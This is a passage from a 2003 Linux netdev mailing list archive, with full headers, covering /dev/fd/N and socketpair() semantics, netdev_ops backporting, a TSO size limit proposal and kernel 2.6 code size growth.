Thinking more about this, changing this behavior would probably break > more programs than it would help begin to function, so this is unlikely > to ever change. From garzik@gtf.org Wed Jul 23 09:59:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:59:34 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGxKFl004669 for ; Wed, 23 Jul 2003 09:59:21 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C4AB2665B; Wed, 23 Jul 2003 12:59:14 -0400 (EDT) Date: Wed, 23 Jul 2003 12:59:14 -0400 From: Jeff Garzik To: "David S. Miller" Cc: Ben Greear , netdev@oss.sgi.com Subject: Re: netdev_ops? Message-ID: <20030723165914.GA29249@gtf.org> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030722220745.379a73c6.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4252 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Tue, Jul 22, 2003 at 10:07:45PM -0700, David S. Miller wrote: > On Tue, 22 Jul 2003 22:06:04 -0700 > Ben Greear wrote: > > > Any progress towards getting the netdev_ops into 2.4? > > > > I have several patches that would benefit (in that no new ioctls > > would be needed) if this goes in. > > If anything, it's going to go into 2.6.x first, and then backported > to 2.4.x after it's had a few months of testing and tweaking. Agreed. FWIW Matthew and I (and several others) are at OLS and basically out of commission for a week, so pretty-please don't make any major decisions this week ;-) Jeff From davem@redhat.com Wed Jul 23 10:03:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:03:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NH31Fl005105 for ; Wed, 23 Jul 2003 10:03:01 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id KAA10803; Wed, 23 Jul 2003 10:00:43 -0700 Date: Wed, 23 Jul 2003 10:00:43 -0700 From: "David S. Miller" To: Glenn Fowler Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723100043.18d5b025.davem@redhat.com> In-Reply-To: <200307231656.MAA69129@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4253 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:56:12 -0400 (EDT) Glenn Fowler wrote: > the problem is that linux took an implementation shortcut by symlinking > /dev/fd/N -> /proc/self/fd/N > and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently > lost, and it is forced to do the security checks None of this is true. If you open /proc/self/fd/N directly the problem is still there. > if the /proc fd open code has access to the original /proc/PID/fd/N path > then it can do dup(atoi(N)) when the PID is the current process without > affecting security If we're talking about the current process, there is no use in using /proc/*/fd/N to open a file descriptor in the first place, you can simply call open(N,...) I've personally always viewed /proc/*/fd/N as a way to see who has various files or sockets open, ie. a debugging tool, not as a generic way for processes to get access to each other's FDs. There is an existing mechanism, a portable non-Linux one, that you can use to do that. Pass the fd over a UNIX domain socket if you want that, truly. That works on every system. From gsf@research.att.com Wed Jul 23 10:24:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:24:51 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHOgFl006012 for ; Wed, 23 Jul 2003 10:24:43 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NHfjJh028191; Wed, 23 Jul 2003 13:41:45 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id NAA90957; Wed, 23 Jul 2003 13:24:36 -0400 (EDT) Date: Wed, 23 Jul 2003 13:24:36 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231724.NAA90957@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4254 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 10:00:43 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 12:56:12 -0400 (EDT) > Glenn Fowler wrote: > > the problem is that linux took an implementation shortcut by symlinking > > /dev/fd/N -> /proc/self/fd/N > > and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently > > lost, and it is forced to do the security checks > None of this is true. If you open /proc/self/fd/N directly the problem > is still there. you missed the point that the original open() call is on /dev/fd/N, not /proc/PID/fd/N; /proc/PID/fd/N only comes into play because the linux implementation foists it on the user > > if the /proc fd open code has access to the original /proc/PID/fd/N path > > then it can do dup(atoi(N)) when the PID is the current process without > > affecting security > If we're talking about the current process, there is no use in using > /proc/*/fd/N to open a file descriptor in the first place, you can > simply call open(N,...) no, in the notation above N is the fd number "so you could simply call dup(N)" here is one reason why /dev/fd/N is useful: /dev/fd/N is the underlying mechanism for implementing the bash and ksh cmd-1 <(cmd-2 ...) ... <(cmd-n ...) each <(cmd-i ...) is converted to a pipe() with the write side getting the output of cmd-i (and marked close on exec) and the read side *not* marked close on exec; cmd-1 is then executed as cmd-1 /dev/fd/PIPE-READ-2 ... /dev/fd/PIPE-READ-n where PIPE-READ-i is the fd number of the read side of the pipe for cmd-i From davem@redhat.com Wed Jul 23 10:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:34:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHXrFl006638 for ; Wed, 23 Jul 2003 10:33:54 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id KAA10931; Wed, 23 Jul 2003 10:31:36 -0700 Date: Wed, 23 Jul 2003 10:31:35 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723103135.3eac4cd2.davem@redhat.com> In-Reply-To: <200307231724.NAA90957@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4255 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 13:24:36 -0400 (EDT) Glenn Fowler wrote: > /dev/fd/N is the underlying mechanism for implementing the bash and ksh > > cmd-1 <(cmd-2 ...) ... <(cmd-n ...) > Interesting. I looked at the bash code, and it uses pipes with /dev/fd/N, and for /dev/fd/N which are pipes the open should work under Linux. This is what David Korn said in his original report. I guess the part that is left is the fchmod() issue which exists because one inode is used to implement both sides of the pipe under Linux. Was the idea to, since fchmod() on pipes modified both sides, to use UNIX domain sockets to implement this? And that's how you discovered the /dev/fd/N failure for sockets? Another idea is to use named unix sockets. Can that be sufficient to solve your dilemma? From alan@lxorguk.ukuu.org.uk Wed Jul 23 10:56:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:56:35 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHuQFl009499 for ; Wed, 23 Jul 2003 10:56:29 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NHpWI5006453; Wed, 23 Jul 2003 18:51:53 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NHogtM006451; Wed, 23 Jul 2003 18:50:42 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: kernel bug in socketpair() From: Alan Cox To: Glenn Fowler Cc: davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com In-Reply-To: <200307231656.MAA69129@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 23 Jul 2003 18:50:41 +0100 X-archive-position: 4256 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Mer, 2003-07-23 at 17:56, Glenn Fowler wrote: > you can eliminate the security implications for all fd types by > simply translating > open("/dev/fd/N",...) > to > dup(atoi(N)) > w.r.t. fd N in the current process This has very different semantics. Consider lseek(). > otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation > and /dev/fd/N should be separated out to its (original) dup(atoi(N)) > semantics I don't see a bug. I see differing behaviour between Linux and BSD on a completely non standards defined item. Also btw nobody ever really wrote a /dev/fd/ for Linux - it was just a byproduct of the proc stuff someone noticed. I guess someone could write a Plan-9 style dev/fd or devfdfs for Linux if they wanted. Alan From gsf@research.att.com Wed Jul 23 11:15:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:15:09 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIF5Fl010955 for ; Wed, 23 Jul 2003 11:15:06 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NIW6Jh028849; Wed, 23 Jul 2003 14:32:06 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id OAA74344; Wed, 23 Jul 2003 14:14:57 -0400 (EDT) Date: Wed, 23 Jul 2003 14:14:57 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231814.OAA74344@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4257 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 10:31:35 -0700 David S. Miller wrote: > Interesting. > I looked at the bash code, and it uses pipes with /dev/fd/N, and for > /dev/fd/N which are pipes the open should work under Linux. > This is what David Korn said in his original report. > I guess the part that is left is the fchmod() issue which exists > because one inode is used to implement both sides of the pipe under > Linux. > Was the idea to, since fchmod() on pipes modified both sides, > to use UNIX domain sockets to implement this? And that's how > you discovered the /dev/fd/N failure for sockets? fchmod() came into play with socketpair() to get the fd modes to match pipe(); its not needed with pipe() we use socketpair() to allow efficient peeking on pipe input (via recv()), where peek means "read some data but don't advance the read/seek offset" btw, this is on systems that don't allow ioctl(I_PEEK) on pipe() fds; if there is a way to peek pipe() data on linux then we can switch back to pipe() and be on our way > Another idea is to use named unix sockets. Can that be > sufficient to solve your dilemma? named sockets seem a little heavyweight for this application From davem@redhat.com Wed Jul 23 11:25:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:25:37 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIPVFl011822 for ; Wed, 23 Jul 2003 11:25:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11118; Wed, 23 Jul 2003 11:23:07 -0700 Date: Wed, 23 Jul 2003 11:23:07 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723112307.5b8ae55c.davem@redhat.com> In-Reply-To: <200307231814.OAA74344@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4258 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) Glenn Fowler wrote: > named sockets seem a little heavyweight for this application I think it'll be cheaper than unnamed unix sockets and groveling in /proc/*/fd/ And even if there is a minor performance issue, you'll more than get that back due to the portability gain. :-) From scott.feldman@intel.com Wed Jul 23 11:44:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:44:57 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIirFl013247 for ; Wed, 23 Jul 2003 11:44:54 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6NIgfG22763 for ; Wed, 23 Jul 2003 18:42:41 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6NI9H705641 for ; Wed, 23 Jul 2003 18:09:17 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003072311563203074 ; Wed, 23 Jul 2003 11:56:32 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 23 Jul 2003 11:44:46 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: Limit skb to be less than 64K with TSO Date: Wed, 23 Jul 2003 11:44:46 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Limit skb to be less than 64K with TSO Thread-Index: AcNQdZja5LXyYcS/TH691cFLiDkcYQA1HdkQ From: "Feldman, Scott" To: "Alan Shih" , X-OriginalArrivalTime: 23 Jul 2003 18:44:46.0713 (UTC) FILETIME=[7D3DAE90:01C3514A] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NIirFl013247 X-archive-position: 4259 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > I am writing driver + smart NIC's firmware. The smart NIC > has limited memory. It can do checksum and TSO but with 32K max. Do we need a netdev->tso_max so the driver can advertise the maximum TSO send support by h/w? From davem@redhat.com Wed Jul 23 11:52:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:52:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIqsFl014439 for ; Wed, 23 Jul 2003 11:52:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11191; Wed, 23 Jul 2003 11:50:32 -0700 Date: Wed, 23 Jul 2003 11:50:32 -0700 From: "David S. Miller" To: "Feldman, Scott" Cc: alan@storlinksemi.com, netdev@oss.sgi.com, kuznet@ms2.inr.ac.ru Subject: Re: Limit skb to be less than 64K with TSO Message-Id: <20030723115032.3f8a95ed.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4260 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:44:46 -0700 "Feldman, Scott" wrote: > > I am writing driver + smart NIC's firmware. The smart NIC > > has limited memory. It can do checksum and TSO but with 32K max. > > Do we need a netdev->tso_max so the driver can advertise the maximum TSO > send support by h/w? Maybe, it's easy to implement. Add netdev->tso_max Add sk->sk_tso_max right after sk->sk_route_caps When sk->sk_route_caps is set, fetch netdev->tso_max via route and put into sk->sk_tso_max. Replace "65535" constant in tcp_sync_mss with sk->sk_tso_max. That shoule be it. From hch@infradead.org Wed Jul 23 11:53:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:54:04 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIruFl014791 for ; Wed, 23 Jul 2003 11:53:58 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOkN-0007Bq-00; Wed, 23 Jul 2003 19:53:55 +0100 Date: Wed, 23 Jul 2003 19:53:55 +0100 From: Christoph Hellwig To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723195355.A27597@infradead.org> Mail-Followup-To: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-archive-position: 4261 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev I think this is not only of interest fir the uClinux folks.. ----- Forwarded message from Bernardo Innocenti ----- Date: Wed, 23 Jul 2003 20:46:46 +0200 From: Bernardo Innocenti Subject: Kernel 2.6 size increase To: uClinux development list Cc: linux-kernel@vger.kernel.org Hello, code bloat can be very harmful on embedded targets, but it's generally inconvenient for any platform. I've measured the code increase between 2.4.21 and 2.6.0-test1 on a small kernel configuration for ColdFire: text data bss dec hex filename 640564 39152 134260 813976 c6b98 linux-2.4.x/linux 845924 51204 78896 976024 ee498 linux-2.5.x/vmlinux I could provide the exact .config file for both kernels to anybody interested. They are almost the same: no filesystems except JFFS2, IPv4 and a bunch of small drivers. I have no SMP, security, futexes, modules and anything else not strictly needed to execute processes. I've made a linker map file and compared the size of single subsystems. These are the the major contributors to the size increase: kernel/ +27KB mm/ +14KB fs/ +47KB drivers/ +35KB net/ +64KB I've digged into net/ with nm -S --size-sort. It seems that the major increase is caused by net/xfrm/. Could this module be made optional? In fs/, almost all modules have got 30-40% bigger, therefore bloat is probably caused by inlines and macros getting more complex. Block drivers and MTD have generally become smaller. Character devices are responsable for most of the size increase in drivers/. -- // Bernardo Innocenti - Develer S.r.l., R&D dept. \X/ http://www.develer.com/ Please don't send Word attachments - http://www.gnu.org/philosophy/no-word-attachments.html - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ ----- End forwarded message ----- From gsf@research.att.com Wed Jul 23 11:54:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:54:59 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIstFl015152 for ; Wed, 23 Jul 2003 11:54:55 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJBxJh029160; Wed, 23 Jul 2003 15:11:59 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id OAA90112; Wed, 23 Jul 2003 14:54:49 -0400 (EDT) Date: Wed, 23 Jul 2003 14:54:49 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231854.OAA90112@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4262 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:23:07 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) > Glenn Fowler wrote: > > named sockets seem a little heavyweight for this application > I think it'll be cheaper than unnamed unix sockets and > groveling in /proc/*/fd/ > And even if there is a minor performance issue, you'll more than get > that back due to the portability gain. :-) named unix sockets reside in the fs namespace, no? so they must be linked to a dir before use and unlinked after use the unlink after use would be particularly tricky for the parent process implementing cmd <(cmd ...) ... From hch@infradead.org Wed Jul 23 11:55:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:55:10 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIt5Fl015239 for ; Wed, 23 Jul 2003 11:55:06 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOlV-0007CJ-00; Wed, 23 Jul 2003 19:55:05 +0100 Date: Wed, 23 Jul 2003 19:55:04 +0100 From: Christoph Hellwig To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723195504.A27656@infradead.org> Mail-Followup-To: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723195355.A27597@infradead.org>; from hch@infradead.org on Wed, Jul 23, 2003 at 07:53:55PM +0100 X-archive-position: 4263 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 07:53:55PM +0100, Christoph Hellwig wrote: > I think this is not only of interest fir the uClinux folks.. Sorry, this actually already Cc'ed lkml :) Still the netdev folks should read it, too. From davem@redhat.com Wed Jul 23 12:01:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:01:25 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ1KFl016606 for ; Wed, 23 Jul 2003 12:01:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11238; Wed, 23 Jul 2003 11:58:59 -0700 Date: Wed, 23 Jul 2003 11:58:58 -0700 From: "David S. Miller" To: Christoph Hellwig Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-Id: <20030723115858.75068294.davem@redhat.com> In-Reply-To: <20030723195504.A27656@infradead.org> References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4264 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 19:55:04 +0100 Christoph Hellwig wrote: > On Wed, Jul 23, 2003 at 07:53:55PM +0100, Christoph Hellwig wrote: > > I think this is not only of interest fir the uClinux folks.. > > Sorry, this actually already Cc'ed lkml :) Still the netdev folks > should read it, too. Well, we gained some code and a little bit of data, but the BSS was cut in half which I think deserves noticing :-) Also, he should analyze the amount of code that actually gets executed for various tasks, comparing 2.4.x to 2.5.x I'd take a half-meg code size hit if it meant that all the normal code paths got cut in half :-) From hch@infradead.org Wed Jul 23 12:07:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:07:06 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ70Fl017284 for ; Wed, 23 Jul 2003 12:07:01 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOx0-0007FY-00; Wed, 23 Jul 2003 20:06:58 +0100 Date: Wed, 23 Jul 2003 20:06:58 +0100 From: Christoph Hellwig To: "David S. Miller" Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723200658.A27856@infradead.org> Mail-Followup-To: Christoph Hellwig , "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723115858.7506829I4.davem@redhat.com>; from davem@redhat.com on Wed, Jul 23, 2003 at 11:58:58AM -0700 X-archive-position: 4265 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 11:58:58AM -0700, David S. Miller wrote: > > Sorry, this actually already 